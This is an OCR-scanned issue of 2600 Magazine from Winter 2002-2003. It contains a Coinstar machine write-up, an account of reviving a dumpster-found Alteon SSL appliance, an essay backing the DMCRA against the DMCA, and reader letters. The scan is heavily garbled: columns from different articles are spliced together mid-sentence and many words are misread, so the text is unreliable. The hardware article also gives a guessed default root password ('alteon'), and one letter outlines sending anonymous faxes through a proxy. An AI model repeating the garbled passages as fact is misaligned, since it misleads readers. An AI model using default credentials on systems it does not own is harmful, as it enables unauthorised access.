employees can access them over the net- work through software loaded on their computers* I received a tour of the headquarters several years ago, and at the lime all the servers were running NT 4*0. 1 did notice another interesting feature while at Coinstar Headquarters. They had a row til ma- chines. dating from the earliest machine through their future models that had not yet been released. Some machines were on and functioning, others were off. However, one (a current model) dis- played a "Press CTRL-ALT-DEL to logon mes- sage. as commonly seen in Windows NT 3 and 4. For this reason, I have a suspicion that the ma- chines run some form of Windows in the back- by phantasm phantasm C? texibox.net Among many of the Lhings I love to take purl in* dumpster diving always has that small thrill of actual treasure hunting. Sooner or later you are bound to find a manual with enough infor- mation to keep you reading for a lew days or evert months. Other times you may get lucky and find an old computer that has parts you can use. A few months ago, during my weekly dive excursion, 1 happened to stumble upon quite a treasure in my favorite dive spot. On top of the dumpster sal a beautiful green system, just un- der 18" wide* 24” deep, and L7 inches tall* I was quite excited about finding something aside from the usual post -it note about where ihey were going to eat. or the regular office memo to pul cigarettes in the ashtray outside and not on the sidewalk. I dropped my umbrella, and after a few at- tempts to gei to the top of the dumpster, 1 made it and put it in my car. Unsure of what exactly it was, I dug around a bit more for a manual or something about it and found nothing. Later that evening I got home and peeled it apart, noting it was quite compact internally. In- side were three PCI slots used by a Fiber Giga- bit E thernet adapter and two CryptoSwift SSL ground, or at least have the capability to Jo so In addition, the machines contain a phone the is I i [iked directly into the CoiiiStar network. If a store employee needs to schedule maintenance, check the next coin pickup, or do any number oi other things* he just needs to open the machine (it is locked with a key) and pick up the phone. Also, when the machine is opened, a pin code must he entered to obtain access to the diagnostic software, statistics, and to change the options of the ma- chine, This code is also needed to access the phone. ] personally have not had the opportunity to access this pan of the machine* mainly due to the lock and the security cameras right next to it (how- ever, the lock is the main obstacle). For all its case of use. a lot of technology sits behind the green plastic of a Coinstar machine, much of which 1 still have yet to uncover. cards. The CPU was an Intel Celeron 500, 64 M RAM chip, and a 64M CF card as its drive. Looking more into if, I noticed there was no keyboard pun, or a video connector at all* so getting into a console would be a slight challenge. Alter writing down part numbers, I put it back together and did a few searches. It ap- peared l had an Alteon iSD- 1 00 and off I was on a search for technical documentation* Hooking it up and attempting to power it on, I found the power button was broken off* A pen lip was all ! needed, and the whir of the fans chimed through the mom. Running a serial cable from its serial port to my system. I tried to get a console that way with no luck. After a bit more reading. I discovered a need for an Alteon WebS witch to access the system, So it was time for a lot more research. The board inside was I ah led Teknor Appli com* Inc.* with a PC L 946-1 system board. B\ using a PCI Video Card, I was able to remove (he Fiber card and replace it to get a video out put of what was going on during boot. I quite pleased to see the system was lull\ functional and hooting tine. Ihe manual for the board showed the pu outs for its connectors* which was a woud help. 1 was able to find the keyboard intcihm 2600 Magazine information in the manual (page 108 of the PDF)* and set up to find a way to add my own. With an old P-II board that got fried* 1 cut out its PS/2 keyboard connecLor with some snips, removed the excess solder from the pins* and cleaned it up for a belter connection. 1 had to figure out a way to set up the connector around the way this case was set up. In the (rue form of imprecision, 1 grabbed a nice length of Cat5 cable (once again found dumpster diving) and stripped the ends of the wires bare for a connection. After some solder work we had the wires connected to the PCI -964 board and ran the Cat5 to the back of the system to another hole provided for another serial port. The con- nector was soldered on at the other end and some electrical tape to guard ihe bare w ires and pins from the ease. Plugging up a keyboard, 1 started it up and saw the damage that could be done. During the BlO*S load* the keyboard Lights came on* and Red Hat Linux began to boot. Staring at the Lo- gin/Password prompt l was quite excited. Of course 1 started with a quick basic guess for root with the password alteon and there 1 sat at a working console. A quick browse around to see what was there and 1 powered it down. 1 removed a crypto card and popped in a 3Com NIC, rebooted, brought up the interface* and turned on SSH. A few changes to set it all up automatically for me. another power down, removal of the video card, and brought it back up, l now had a system to play with at my desk for more comfort* From there I got a bit more curious and wanted to expand the system some more, I added 256M of RAM, then attempted to add a 2()Gig HDD and a CDRQM. I didn't have much luck with that, hut found out if I removed the CF Card I could use the HDD on /dev/hde where the CF used to he. After a bit more play- ing. I got Linux installed on the 20 Gig drive on /dev/hde and it was working fine as a home server. The system provided me with well over a month of fun and learning* as well as some in- teresting calls to Nortel trying to understand the BIOS and restrictions set into it. Granted I did not get much information - it was brought to my attention that reselling it required removing and adding a new BIOS chip which I am too lazy to do. The n i oral of this I ong wind ed arlic le ? Dumpster diving can provide you with expen- sive treasures and a long time of fun and learning. Thanks to 404 and Tyler for assistance on systems running CompactFlash cards and the rest of Textbox Networks for help on other areas of learning the system. Related Sites Alteon Users Guide: http://wwwl42,nortelnet works.com/bvdoc/Hlieon/isd_ssl/050 1 25 ,C.pd f Te k nor A ppl i c o n i PC I - 946 - 1 H arc! ware G u ide : h Li p : //w w w. kont run . com/lech l i b/ni an u al s/PC I - 946H_and_P3544QBX_manual.pdf The Digital Millennium Copyright Act (DMCA) and the Digital Media Consumers' Rights Act (PMCRA) are at Lhe opposite ends of the "copyright rights 1 ' axis, so to speak. Rep- resentative Boucher and Doolittle's DMCRA will amend the changes made by the DMCA to prevent the corporate abuses of pow er that have been possible under the DMCA* I he DMCA was enacted in 1998 to take el - led m the year 2000, The DMCA modified the US. copyright statutes to provide protection for 1 n py righted digital material* Since 1790 Con- gress has made modi lie at ions to the U.S. copy- Winter 2002-2003 DMCRA right statues to accommodate new material. The DMCA is just the next step in the series of mod- ifications to the copyright statutes* There were other reasons for the DMCA's enactment* At the 1996 World Intellectual Property Organization Diplomatic Conference, the U.S. adopted the World Intellectual Property Organization treaty. There was a perceived need to comply with that treaty: the DMCA made that compliance but added much more than was necessary. Copy- right owners were rightly concerned that their works would be pirated on ihe digital frontier. Congress did not intend for the DMCA to be abused as it is so today. The DMCA was en- Page 26 Page 27 acted to dear the gray area of pirating copy- righted digital works and lo ban the "black box" type devices intended for that purpose. In prac- tice it has worked to that end and beyond. The new clauses and provisions to the copyright statutes have been abused aggressively to stifle and control many legitimate activities. The DMCA added anti -circu invention measures to the copyright statutes that forbid under penally of law gaining access to a work by "circumvent- ing a technological protection measure that would otherwise effectively control access to a copyrighted work'. Hie DMCA also prevents the import, manufacture, or export of any device that can circumvent that protection. By doing this the DMCA gives copyright holders complete control over their works, no matter what the circumstances. Historically, the U.S. copyright laws haven't given copyright holders this total control. A major "safety" on this type of control is Lhe fair use doctrine. Fair use allows the end user to make copies of a copyrighted work for personal use. educational use, use in commentary, criticism, and parody or any other solely socially beneficial use, A work protected by the DMCA cannot he copied by the end user without the express consent of the copyright holder. This completely nullifies the fair use doctrine and tilts the balance of power dangerously tow ard the copyright hold- ers. By the same means the DMCA lakes away the rights of f irst Sale and Limited Time. First Sale gives the end users the right to sell a copy of a work over and over once it is made. Lim- ited Time limits the lime that a copyright is in effect. The copyright is granted for a limited time and alter that Lime is up the work goes into the public domain. The power that copyright holders now have over these rights is shown in their use of the DMCA. Dimitry Sklyarov, a young Russian Ph.D. at Moscow University, was invited to speak at Defcon about some of his research. His speech outlined Adobe's e-Book security and its weaknesses. He and his company had devel- oped a program that allowed the end user to make copies of an Adobe e-Book, which was completely legal in Russia but illegal under Lhe DMCA. He was arrested. Not for copyright in- fringement or for helping anyone else infringe upon copyright, but solely for citing weak- nesses in e-Book security. He was arrested be- cause someone he never met might use what he learned through his research to copy an e-Book without the publisher's permission, Adobe used the DMCA to punish Sklyarov for speaking out about his research. After months of imprison ment Sklyarov was linully released under an agreement w ith the Department of Justice. Aftei his release the DMCA continued to pro sect iu his employer, ElcomSofl, under the criminal provisions of the DMCA. ElcomSofl is based in Russia w here there is no DMCA. The DMCA is reaching across continents to stifle free speech Prior Lo this, the Motion Picture Association of America (MPA A) brought suit against 2600 Maga z in e fo r pu b I i sh i ng DeCS S on its we h s i te . DeCSS is an open source application that al- lows Linux users to play DVDs. DeCSS s pri- mary use is a DVD player. It also has the ability to change file formats from DVD to MPG which is like playing a DVD and recording it to a VHS tape (which is. again, legal under the fair use doctrine). Because it can do this it has be- come the target of the MPA A through the DMCA, 2600 was not accused of being in- volved in the development of this tool, nor was it accused of having used the softw are for copy- right infringement. The lawsuit was brought upon 2600 simply for making the source code available. Free speech was denied to 2600 when they were enjoined from publishing the DeCSS source code. 26(X) lost the case and lost the ap- peal. Some good can be said to have come of this though - it was decidedly the most public display of the dangers of Lhe DMCA ycL The case provided a wake-up call to the hacker com- munity and gave the world a glimpse of what corporations can do with the DMCA. In September of 2000 the Secure Digital Music Initiative (SDMI) issued a public chal- lenge encouraging the hacker community to de- feat new watermarking technologies the SDMI hoped to use to thwart piracy. Professor Edward Pel ten and his team of researchers from Prince- ton. Rice, and Xerox took up the challenge and succeeded in circumventing the watermark con- trols on the music liles. When the team tried to show their research at the 2001 Usenix confer enee, the SDMI threatened Pel ten with the DMCA. The threat w r as in the form of a letter that was delivered to Felten and his team as well as their employers. Sharing research such as Fe! ten's is common practice in the computer sci- ence held. It shows others' mistakes and can only lead to better solutions. If Felten and his team presented their research the original sect! rily technology would of course be compro raised. but many w f ould offer suggestions to improve or replace the weak technology. Even Page 28 2600 Magazine after SDMI had given Felten and his team per- mission to circumvent their watermarking tech- nologies, they were still able to revoke the right of free speech with the DMCA. Fe lien's team brought suit against SDMI and subsequently made a partial release of their research. Prominent Dutch cryptographer Niels Fer- guson recently discovered major flaws in a commercial hi -definition video encryption sys- tem. Ferguson rightly fears legal action under the DMCA and has therefore declined to release any of his work. He doesn't talk to his peers and scientific colleagues for fear of his research simply reaching the U.S, which he thinks could be interpreted as a violation of the DMCA. This ^hows the beginning of a horrible trend. Scientists arc withholding research or simply avoiding the U.S, out of fear. Scientific devel- opment in the U.S. is being stifled for the bene- fit of the corporation. Scientists now fear the U.S. They fear the "Land of the Free' because corporations arc given power over individual rights. The DMCRA will give that power and the rights back, to Lite consumer. This bill will re- store the historical balance between copyright holders and I he end user, 11 this bill passes in the next session, the rights that the DMCA threatens will be restored. It will reaffirm the fair use doctrine in the digital world, making it legal to circumvent a technological measure preventing access as long as the circumvention falls within the guidelines of the fair use doctrine. It adds ex- emptions for scientific research which reestab- lishes the Beta max standard. The Beta max standard would, in the digital world, allow the manufacture anti distribution of software or hardware that can be used to circumvent tech- nological protection measures as long as it has a legitimate use. The reestablishment of the Beta- max standard would put scientists at ease and encourage scientific research to continue as it always has in an open forum style without fear of prosecution for discoveries. Security can again be developed, unimpeded by the DMCA, Proper labeling of "copy- protected CDs" will also be ensured. This new breed of CDs. mar- keted as regular CfX have been known to have playback problems and have also crashed quite a few computers with their aggressive pro te ct i on me as u re s , This bill has already won the support of many major public entities, l he supporters in- clude: Intel Corporation. Phillips Consumer Electronics North America, Sun Microsystems. Verizon. Gateway Consumer Electronics Asso- ciation, American Library Association, Associa- tion of tile American Universities, Association of Research Libraries, American Association of Law Libraries, Medical Library Association, Special Liberties Association, Digital Future Coalition, Consumers Union, National Writers Union, Home Recording Rights Coalition. American Foundation for the Blind, and the Electronic Frontier Foundation. Many of the supporters are library or writer associations of some kind. It can be inferred that the libraries and writers may fear the DMCA as the means to an end of an era. an era of free speech and fair use. The way is now clear - the public’s rights are threatened and the DMCRA is their boon. Li- braries and writers across the United Slates gather under the DMCRA's flag. Without the DMCRA organizations like the MPAA gain more o! a foothold in our society. Organizations like the Electronic Frontier Foundation have long known the effects of the DMCA and the power it grants to corporations. The MPA A s actions have paid off, but not in their favor. The average citizen has at least heard of the DMCA and many have now joined the light against it. When the DMCRA is enacted, the power will be returned to the people. Greetz: Kahian. Zim, Bill and Ducky . Save Far 8 cape. Winter 2002-2003 Page 29 Spreading News Dear 2600: Some renters may already know this, but sneake majl.com is a service that allows one to generate dis- posable email addresses that forward to your real address. It provides a self documenting method of tracking who sells your email address so that you can confront those companies with proof that they sold your address, NoSpa tim Dear 2600: In 1 9; 2, you printed a letter from one "MW" who was asking about how to send anonymous faxes. For a small fee. this person could use an e-fax service such as www.maxemail.com to send a fax anywhere the user accesses the Internet, Using a good proxy server or other anonymous access point would allow the user to send an anonymous fax. Along these lines, users wishing to receive anony- mous faxes may find the free services of www.fmxwave.com to be useful. They assign you a unique phone number (no extensions!) and receive the faxes for you. Upon receipt, the transmission is con- verted to a .t if file and emailed to any email address of your choosing. All numbers are issued from the 115 area code and the exchange varies but is usually local to Reno, Nevada. Keith Dear 2600 : This is regarding the fax from Direct Media America on page 13 of 19:3. Looks like there's an on- going investigation of Direct Media America hy the Florida Attorney General. scott We certainly can ! say we're surprised. Dear 2600: Many people probably already know about this, but www payphone-project.com/ is a website with the phone numbers to thousands of payphones all around the States. Sfctrdonicus Hopefully the kind that still take incoming calls. Dear 2600: l truly admire your magazine and how hard the staff of 2600 works to show us the information which the government and corporations try to control and distort. You're a group that the government tries to suppress like any group that stands against the system, one that will be targeted by those in "control ' just to protect their own interests. Soon I'll be starting a 2600 meeting here in Puerto Rico with technological themes and political issues too, highly influenced by your magazine. You people are an inspiration lor the hacker community and I really appreciate youi struggle away. Feedback I Dear 2606: I have been following the topic of right click sup- pression in your magazine for the last couple of issues and decided to put my Two cents in, I am a photogra- pher and on my website, my gallery images have right click suppression on them. The reason for [his is rather interesting. J feel that if you really appreciate an image that I have and want to have a copy of it. you should cither contact me or, even better, find a way to work for it. This ss one of the basic parts to hacking in my book, finding rew r ways of learning. It is not harmful or destructive, and if you find a wav around something, than you have learned something new. Props to you, and keep up the good work. Traveler Dear 2606: In response to Erovfs comment about script kid- dies and the ratio of master to newbies: The way our world is now is fine when it comes to the script kiddies and the masters ratio. Both have dif- ferent goals. The masters' goal is to expand their abil- ities and show off hy creating the program. Recognition for the program is among peers, not by the ignorant majority shat is clueless to the true art of anything they do. Masters are happy how they are. programming. Script kiddies find joy in just breaking into school computers and by petty acts of malice that bring recognition by the ignorant masses. That makes the script kiddies happy. As long as everyone is happy, what's ihe problem? XiChimos We weren't aware that everyone was so happy. Perhaps we could join in a chorus of Ode To Joy if the people committing "petty acts of malice " stopped call- ing diem selves hackers to the ignorant masses . Dear 2600: I just finished watching Freedom Downtime two minutes ago. I finally got around to ordering it and as soon as I got home and saw that package in my mail 1 opened it up and popped it in ihe VCR, I just want to say I thought it was great, I especially enjoyed the Mi- ramax protest and your across the count ry trip to gel the word out about Kevin I plan on making copies and giving them to my friends; 1 also hope to have a showing at my school. Thanks for taking the lime to make such a great film and keep up the good work. joe Dear 2600: l just read the article in 1 9:2 about doubleclick. net and how evil it is, as w^dl as the letter with a solution involving iplables. This is all fine and dandy, but h Page 32 2600 Magazine definitely looks like killing a dog with a cruise mis- sile. The first thing [did was start up Moz.il la and see what it had in its preferences, and I saw that nut only does Mo/.db have reasonably flexible coolde block- ing stuff, it has image blocking stuff as well. Here's the easy two-step process that doesn't require firewall software or root access {a definite selling feature on those lovely university unix labs): L) Change your cookie setup. Only accept them from the originating web sire and lell it to ask before storing a cookie. Mozilla can remember your decision about cookies, so the dumb popups are a one-tune affair fur sites you visit regularly. 2.) Find a site with doubledick.net ads. 1 googled for ' funny puppies " and won on tny first try: block images from this site" on the ad ( right dick, duhl, I'm moderately annoyed that dicy didn’t let you add sites to block images from in the preferences menu, but you can't win them all, I guess, 1 don't know what they manage to squeak by wulh javascript, but Mozilla lets you disable javascript's ac- cess to cookie data, its ability to make cookies, change images, and so forth, so it can probably be mostly curbed. The preferable solution would be to ignore javascript and images based on a configurable list of keywords. Opera lias similar features, but I don't think they’re as Complex. IE's approach to this seems to be along the lines of telling the user, ’'don't try to hide from my money grubbing masters or I will crash your computer" I haven’t checked konqueror yet. Bob M. Dear 2600; This is a response to a letter written by que! in 19:2 which suggests blocking web ad images by adding each image server IP to Linux net filter rule ta- bles, ['here are several much easier ways to block ads, such as: L) Add the server's name and the address 1 27.0.0. 1 to your /etc/hosts fife. (Windows has a hosts file too at C:\windowsMiosts or C:\wmnt\system32\div ven5\etc\hosts.) 2.) Use a browser (such as Mozilla) or browser plugin that can give you better control over the im- ages that the browser downloads and displays. 3.1 Most importantly, try out a personal web proxy such as Privoxy. Adzapper, Web Washer, or Guide .scope. If you haven't heard of any of these, Google is your friend. Eil Dear 2600: Thanks for publishing so much discussion of the gun control issue. Despite the fact it is not directly connected to hacking or freedom of information, your readers seem to be very interested in it. I’m a new reader who picked up a bunch of back issues at H2K2. and I've been following the debate backwards to 18:3, I'm sorry you don't support the right to bear arms the way, say T American Rifleman (the main NR A maga- zine) supports f reedom of information. 1 would like to point out a nonsense statement: If only hackers were treated as well as gun owners in the United States!" Violation of (he DMCA of 1998 car- ries a penalty of up to five years in prison for a first of- fense. Violation of the NFA of 1934 (for example owning what the DoD calls an assault rifle, sawing off a shotgun, or making your own gun of any kind) car- ries a penalty of up to 10 years in prison. I also feel (although this is more subjective! that the plethora or laws governing firearms ownership are more onerous; I've never been fingerprinted in order to buy a packet sniffer, or had to appear in person at the sheriffs office lor a license to carry a password hash cracker. I do not risk live years imprisonment for forgetting to dear some software oft my laptop when 1 go to visit my parents in New Jersey; if [ accidentally leave any standard hunting ammo in my car, 1 risk (hat, Charles if you an like an idiot with deadly weapons, you should he prevented from continuing to do so. It's amazing how many people sec that as a violation of their rights yet will blindly support idiocy like the Pa- triot Ait without a second thought* What we don 't sup- port is the attitude that anyone who suggests any form of regulation of firearms is somehow advocating dis- arming the populate, no dtmht in furtherance of some hidden agenda, ft's an hysterical reaction that only manages to demonstrate how had the problem is . There are ail kinds of legitimate reasons to own guns. But. being deadly weapons, they cannot conflict with the needs of society. That's why we frown upon walk- ing around schools and churches with firearms, re- gardless of what you think the Constitution says you can do. It's why deranged individuals rend to he dis- couraged from becoming gun hobbyists. These direc- tives ore coming from the people, not from some invading go verrm tent. If we can get major politicians clamoring for the rights of hackers and the "National Hacker Associa- tion'' challenging the government to pry our key- boards * from our cold ' dead hands " then maybe hackers will have a chance of being treated better than gun owners , Until that day, it's an absurd comparison . Dear ^Aft- Regarding the cover of 19:2. 1 was wondering it that "building" that kinda looks like the U N. is actu- ally an integrated circuit that I've seen in some touch- tone phones from the 70s and 80s, and the nound "building - ' being a receiver or speaker of some sort Is that right' 1 S noticed because die "hu tiding" is not fac- ing die same direction as any of (he others, Nicely done! Thanks for your magazine - love every minute I read it. ShadowfaxO You're -very observant. But we really don 't deserve the credit this time The round building is actually Madison Square Garden with the surrounding ones being part of the Pennsylvania Station complex in Manhattan. Across the street (in the middle of tin cover) is the Hotel Pennsylvania which is where tin. HOPE conferences are held . A trained eye can see the little bridge that hooks Two of the conference rooms on the top floor together. Dear 20Aft* 1 am a 2600 subscriber. Recently by chance I viewed Freedom Downtime on Free Speech I V 2600 Magazine tFS rV) and was amazed to learn about the details of Mr. Ke vin Mitnick. The reason for my letter is to basi- i ally express my opinion on the case. First of all. where is the American Civil Liberties Union? H a ve \ he y i gnore d M n M i tnick ' s e ase ? Tl us is Lie finitely a case for the ACLU. Needless to say what Mr, Mitnick had to endure w as unnecessary and illegal, l feel that the film should have concentrated a lot more on die constitutional is- sues and made it clear that one of our inalienable rights given to everyone Living in the United States of America by the U S. Constitution (the supreme law of the land] is the right to a speedy trial. VVhat f fill! to understand and what the film does not fully explore is how any jurisdiction was able to keep a man incarcerated lor such a long time without a I rial. The film leads me to believe that Mr, Mitnick was deprived of his freedom until he acquiesced lo a guilty plea. Is this (he case? Was the government holding him hostage in exchange for a guilty plea? Should (his be (he case, then the entire movement and Mr. Mitnick should tile suit against ail parties in- volved in the unlawful detention, and the civil liber- ties and constitutional abuses toward Mr. Mb nick. The film concentrated heavily on what Mr, Miinick did not do. on the lies various writers were writing about, on the hacker community, and Mr. Mimick's detention without a trial? But I believe it failed to drive the nail down to the core by not mentioning the constitutional erosion his case represented and (he danger of his situation for the sake of all Americans. Please do not get me wrong, \ respect all of the hard work that went into the film and the movement .is a whole, I am just offering a perspective which I believe would gel a stronger response from the legal and politicaJ community. I would not w r ant to think that all of the hard work of the civil liberties move- mem of (he 1 960s or (he injustices and (he suffering of those who then fought very hard to keep (he integrity of the U S. Constitution and (he Bill of Rights were suddenly fuTgnlten when Mr Miinick was denied his freedom, placed into solitary confinement for eight months, and left incarcerated lor about four years without due process! Any state representative, Senator, or Congress- man should hear Mr. Mitnick's story and all parties in- volved in this abusive behavior should be prosecuted, ! his is of paramount importance. Perhaps I am naive i rid 1 have loo much faith in our Constitution and 1 cannot begin to imagine how these abuses could have been so blatantly executed by the authorities. Any competent constitutional lawyer should have been able to have him released. It is very very difficult I nr me to believe the events as they were explained in the film. I greatly respeci (he effort, time, and energy that went behind (he scene and (he entire Free Kevin network. However I cannot understand why one of the unwl powerful weapons and protection {(he U.S, Con- ditulion) was never mentioned in the film. Mr Mitnick's lihcrty as well as all of our liberties i iv at great risk. His case should not be forgotten and h 3 rev Kevin movement should evolve to the next U vc I. A level of awareness, education, and realization here his case should be made known on legal fourt- Winter 2002-2003 dations and the indisputable truths should he ad- dressed Eind examined by professionals as well as po- litical representatives of the people (there are still some honest ones out there). A level where die legal system should take slops to correct itself and publicly admonish those who were involved in this case Oth- erwise we are all in great trouble. 1 conclude where ] started. Where is the ACLU? hawk 20041 AH of the questions you asked are ones that we also struggled with thtvughout the making of the film, IPs frustrating not to get clear and definitive answers , And we wish it were that easy to actually get justice offer demanding it. For now. we 7/ have to settle for trying to educate the masses. Phase help spread the word and maybe you'll manage to get some sort of re- spot i sc from th ose responsible. Dear 2600: 1 have to commend Kevin Mitnick and William Simon for their amazing book: The .Art of Deception. We have begun living tn an era of secrecy and of sus- picion, and still the weakest factor in any situation re- mains the human element. It's hard to give this book just praise without sounding like an advertisement. Amazing work, Kevin, simply amazing. Poetics Dear 2600: I’ve picked up your last four issues and have found myself sincerely enjoying them because of your lack of bias. In journalism it's difficult to separate your per- sonal feelings toward a subject from the writing you do on it, and 2600 is mainly focused on topics people feel strongly about. But what makes your publication superior, or unique in any case, is that you usually can't be caught puitiug down other people's views or campaigning your own. I t s the mark of a well (bought out organization of articles that allows your quarterly to maintain a calm composure during days of civil un- rest.,. days that wont end while we are alive simply because (he public remains apathetic while power- hungry fat cats grow fatter. I’m not going to the ex- treme here - insurrection is only necessary when we agree it s necessary, bu! readers and writers of your publication seem to be of the intelligent group that un- derstands their rights and won’t give them up without a struggle. Nietzsche Thanks for the kind words but we are most defi- nitely biased, ft's really impossible not to he. espe- cially with this kind of subject mutter. What's most important, as you point out, is to respect other opin- ions . , Otherwise, there's little chance of a meaningful dialogue. Dear 2600: What's up with publishing an outdated article on shopping cart flaw s ( 19:3)7 The flaw that Mr. Moore discusses has been around for as long as I can remem- ber and has been fixed, for the most part, by shopping can authors that are worth anything. As a former site designer/ tret work admin 1 ran into iliis problem with some shopping cart software way back in 1998. \ con- tacted the author and the problem was patched up Page 34 Page 35 within days. I r m wondering if Mr. Moore has in- formed i lie company in die article about their prob- lem? If not, as an ethical "hacker." I think that would be the honorable thing to do. Our job is to help people team from their mistakes, not punish them for k, r JaMmSr We exist to report on discoveries and findings. Anything beyond that , good or had. is extracurricular, A s for this article, vou seem to be against its being printed regardless of whether or not it w.v outdated. If ai! of the hugs were fixed before we printed them t (hen we would indeed he printing outdated info and getting more complaints like yours , Hut non -outdated info leads to implications { like yours) that we’re pun ■ i siting people and not being ethical. It seems we van’t win. Dear 2600; Thank you for your reply to my letter regarding people's saved email tiles being shared on Kazaa, While I don't agree that reading other people’s email which they are sharing is clearly an invasion of pri- vacy" in the same way that reading private mail my neighbor posts on a billboard on his front lawn would- n't be. 1 respect your opinion on the matter. Also, I should have added that it's always best to email those round affected and Jet them know they're sharing the wrong stuff. l r vc gotten both thanked and threatened in response to that, which is nice. Rob T. Firefly We didn't mean to unply that the privacy invasion was your fault. And what you did certainly isn’t a crime , But those who go around using other people s stupidity to invade their privacy are still invading their privacy, albeit in a passive way much like listen- ing in on private phone rails broadcast in the clear By letting the world know you performed a valuable service. Dear 2600: This is in response to HJH's article Pf A Nasty NT Bug" in J9;2. I'm happy lo ssy that the bug reported in the ankle has been patched. Whereas 1 an unsure when Win 2000 was patched f Win XP was fixed by $T>I. Also, the current Beta of Win NET is com- pletely immune from this hug. I guess it just goes to show, when 2600 talks, Microsoft listens. Good show, and keep up the good work. Jason Argonaut It's quite possible this was reported in some other way but thanks for the good thoughts. Dear 2600: I agree w ith the philosophies of your magazine on one level- I've also noticed it is easy to get caught up in. And sometimes I find myself agreeing w ith what you advocate and other limes questioning it, While I love the info, 1 have to question it. If we never ques- tioned. we would all be sheep. While 2600 is defi- nitely an authority in the hacking world (or underworld if that is easier to swallow k I urge the readers lo mill over and ultimately question what they read. Because even if they are fellow hackers, you don't have to agree with them or their ideals. And as idealistic and good-sounding as 2600 is, that doesn't make it 100 percent correct. I'm not accusing 2600 of anything. I'm just saying that you should question everything to make sure it works lor you. Being spoon-fed by other hackers is the last tiling we need. Question This. Question Life. Question Star Trek. But more importantly. Question Everything. Resurrect ion 20 We couldn’t agree more . Unquestionably, Injustice Department Dear 2600: While you may feel like this letter is an attempt at someone using you as a soapbox to rant ahout repres- sion of their right of free speech, it is actually my ac- knowledging some intriguing similarities between your lawsuits and my job (if that makes any sense). I work at an adult video/loy store in California in a town of less than 10,000, although we serve approxi- mately 100,000+ clientele from all over the area. Due to recent events, our store will be forced to shut its doors forever due to ignorance and hatred aimed at us, simply because we are looked down upon by our local government and several religious circles. In more de- tail. the town government instated a law that prohibits any adult related shops from conducting business within 20(H) feet of a school and 1 500 feet from any church. This is ironic because we are two blocks away from an elementary school and four blocks away from our local Presbyterian church, and the bw was instated two years after we had opened! Anyway, our store has always obeyed the strict laws that the state regulates our industry by, and we have always been in cooperation with these as well as any city ordinances, wutli exception to the one stated because of obvious reasons. We have been in constant court battles, won every single appeal, and still our lo- cal government has us in their crosshairs. The clincher here is a recent overnight arson at- tempt on our store which did approximately $45,000 in damage and also ruined our already tarnished im- age w r hen the newspapers printed the city's response to it: "That is the kind of people that ****** Video World attracts, h is their own fault tor bringing lowlife trader trash mu> the city, and they get no sym- pathy from us." That is directly out of our local newspaper The store owner decided u> shut down in October, l now have to take two jobs to match the salary l was making in order to keep rent and afford tuition. My insurance has already been canceled and l have to pay $95 every other week for a bottle of insulin so E can live. Yet the most hurtful thing of all is that I have lost dose friends, some family members have turned their backs on me, and I have even been refused ser- vice at a local grocery store because the owner knows where I work! And why exactly? Religiously influenced and bi- ased government taking a stranglehold on a privately owned adult shop simply because they decided to conduct business. Not because they did anything wrong, hut simply because it existed and certain people didn’t want it to. 2600 Magazine All the best with your endeavors. Thanks for it I ling like it is instead of how they want us to think it is. deejayredlOO II We have no doubt (hut some of our readers will disagree but we find the above treatment all too com- mon and symptomatic of some serious problems in our culture. Unless you were soliciting customers from the elementary school or leaving brochures in the pews of the church, you should have been treated as any other member of the community. This kind of coexistence happens in other countries all the time n ithout any adverse effects. We, on the other hand, stent to he moving ever closer to a fundamentalist hell. Dear 2600: Thought 1 would tell you guys about my web host and how they have annoyed me. They were line for about half a year, then suddenly a few days ago my site disappeared. All the files have been deleted and ill that is visible is a placeholder I have been locked ■ tut of the admin interface, too. What annoys me is that I had no warning, no explanation, and no chance of backup- It simply switched off. I have tried contact- ing them. They won't get back to me via email and their phone number doesn't work, ll is companies like these that really disappoint me. It's gotten harder to find decent, proper companies that don't treat customers as if they were meaningless. Mart There are a couple of lessons here. Always keep vrmr own backups . Never rely on people you don't re idly know to do anything except cash vour checks. \tul whenever possible, try to run your site yourself That way , the most you can lose due to someone else 7 uu ornpetence, ill will, bankruptcy, etc. is a temporary loss of bandwidth. Dear 2600 : I work as a delivery driver here in North Carolina .md I usually gel home rather late, 1 live in a fairly small town (2,000 residents and 10,000 college kids) and my car is very easily identifiable by the numerous computer related stickers on the back of it. I was slopped by the law at a license check,., a fairly routine happening. They looked at my license and (hen asked me to pull off to the side - an officer would be with me shortly? 1 After waiting for ten minutes, the officer ho pul me aside asked me to step out of the car. Now i vmember, I am a delivery driver, and common sense would tell you that 1 have a valid driver's license and also that I would not be under the influence of any Ltbstance t perhaps caffeine?). So naturally, l was a hit puzzled by this. He then aske d me if he could search my car and of course I said (in a polite fashion), "No. you may not. I do not feel that [here is any reason for vou to search, and certainly no probable cause " Qh t but this officer found probable cause... there was a lack of 2600: The Hacker Quarterly in my back seal I uing from 1998 through 2002. He said that this was a "suspicious magazine 1 ' and he was baffled that I ■a on Id even think to have such a thing in my posses- ion. I told him that I did not believe this was any rea- < m or cause to search my car* so he called one of his Winter 2002-2003 hoys over. They told me that I was interfering with an officer's line of duly and that I could be thrown in jail for such behavior, t am not one to get thrown in jail (especially at the age of 18, still living with parents), SO / stepped aside. After a 30 minute search, they de- cided the car was line and there was uo reason to hold me any longer. They even had drug dogs there to sniff everything out.*. looking for that kilo of cocaine that every cop just JbfflH-s is in there somewhere. Needless to say. I think that this is a perfect example of what the media has done to "hackers" and the image they have drawn of us. I would love to press charges, hut being an 18 year old entering college, I simply don't have die funds. Evnglion You acted entirely properly by questioning them, keeping your cool , knowing when to hack down , and letting the world know what happened. Unfortunately this kind of thing will continue to happen. It s always a goud idea to get as much information as possible from the scene ear number , ; bculge number, names, etc. in the event that you decide to pursue matters later Most people choose rtof to and we completely understand why* Dear 2600: First off, great magazine - you've managed to in- form the hacker world of many new laws, news, ideas that otherwise we wouldn't experience through main- stream media, I had closely followed your trouble over the domain fuckgeiieralmotors.com Upon hear- ing this* l too was outraged that because a big corpo- ration saw' some offense to this* they should go strip away a component to our First Amendment. So in support of your effort, I registered www.generalmo- LorssLicks.cjb.net. I successfully maintained the site w'hich I Linked to ford.com. But not too long ago. I found that my page had been shut down without no- tice. my password to my account was invalid, and I have had no contact from any .cjb rep I am consider- ing filing a law-suit or at least notifying the public of this so they can also voice their concern. Any thought/ word would he appreciated, ini .source Since you re using this company's name, they have the ability to simply disconnect you (although they seem rather immature for doing it the way they did). If you want to make any kind of statement using a do- main name, you should register the entire domain name under .com, .net, etc. and then find service through the provider of your choice. If they shut that ojf r it’s a much bigger issue. Dear 2600: i was in Wal-Mart in Hammond, Indiana the other day - the day the Spider-Mart DVD and VHS came out. So J figured I'd go pick up a copy 